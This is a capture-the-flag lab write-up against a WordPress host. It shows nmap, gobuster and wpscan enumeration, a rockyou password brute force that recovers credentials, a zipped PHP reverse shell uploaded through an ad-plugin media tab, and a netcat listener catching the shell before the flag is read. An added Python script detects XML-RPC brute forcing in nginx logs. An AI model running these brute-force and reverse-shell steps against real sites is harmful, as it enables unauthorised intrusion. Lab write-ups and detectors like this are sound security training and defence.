PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.158.121 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/wordpress (Status: 301) [Size: 194] [--> http://192.168.158.121/wordpress/]
Another WordPress install on an intermediate machine; this time, however, wpscan's passive plugin enumeration finds nothing 🥲
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.121/wordpress/
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://192.168.158.121/wordpress/> [192.168.158.121]
[+] Started: Sun Jul 17 00:13:05 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.158.121/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.158.121/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.158.121/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - <http://192.168.158.121/wordpress/>, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - <http://192.168.158.121/wordpress/>, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:09 <=======> (137 / 137) 100.00% Time: 00:00:09
[i] No Config Backups Found.
Next, enumerate users:
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.121/wordpress/ --enumerate u
[i] User(s) Identified:
[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
A simple wpscan password attack with rockyou.txt against that user gives us login credentials:
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url http://192.168.158.121/wordpress/ -U loly -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:19 < > (175 / 14344567) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
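As an added defender-side example (not part of the original writeup), the following Python script flags the XML-RPC password-guessing pattern seen above, many POSTs to xmlrpc.php from one source in a short window, in nginx access logs. The log lines, source addresses and threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx "combined" log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse(line):
    """Return (ip, timestamp, method, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")

def detect_xmlrpc_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Map each IP that sent >= threshold POSTs to xmlrpc.php inside one window to its largest burst."""
    posts = defaultdict(list)  # ip -> timestamps of POSTs to xmlrpc.php
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method == "POST" and path.split("?")[0].endswith("/xmlrpc.php"):
            posts[ip].append(ts)
    alerts = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window forward
                start += 1
            burst = end - start + 1
            if burst >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), burst)
    return alerts

def make_sample_log():
    """Constructed log: one host hammers /wordpress/xmlrpc.php 25 times in 25 s, plus benign traffic."""
    base = datetime(2022, 7, 17, 0, 20, 0)
    fmt = "%d/%b/%Y:%H:%M:%S +0000"
    lines = [f'192.168.49.158 - - [{(base + timedelta(seconds=i)).strftime(fmt)}] '
             f'"POST /wordpress/xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.22"'
             for i in range(25)]
    lines.append('10.0.0.5 - - [17/Jul/2022:00:20:30 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    lines.append('10.0.0.5 - - [17/Jul/2022:00:20:31 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"')
    return lines
```

A single legitimate XML-RPC POST from the second host stays below the threshold, while the 25-request burst from the first is reported with its size.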
Clicking Log In redirects us to loly.lc, so it's time to add that hostname to /etc/hosts.
Then log in with the credentials loly:fernando; the screen that follows can be skipped and ignored.
After login, the green Ad menu item caught my attention, so I navigated to Ad Rotate > Manage Media, and indeed there is an upload tab right there: time for php-reverse-shell.php.
However, we need to package it as a .zip, because the upload is extracted automatically (read the description!).
Then we set up our netcat listener and visit this link:
<http://loly.lc/wordpress/wp-content/banners/php-reverse-shell.php>
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.158] from (UNKNOWN) [192.168.158.121] 55034
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
21:33:37 up 27 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/var/www
$ cat local.txt
c5f757373463346391e129735b77e067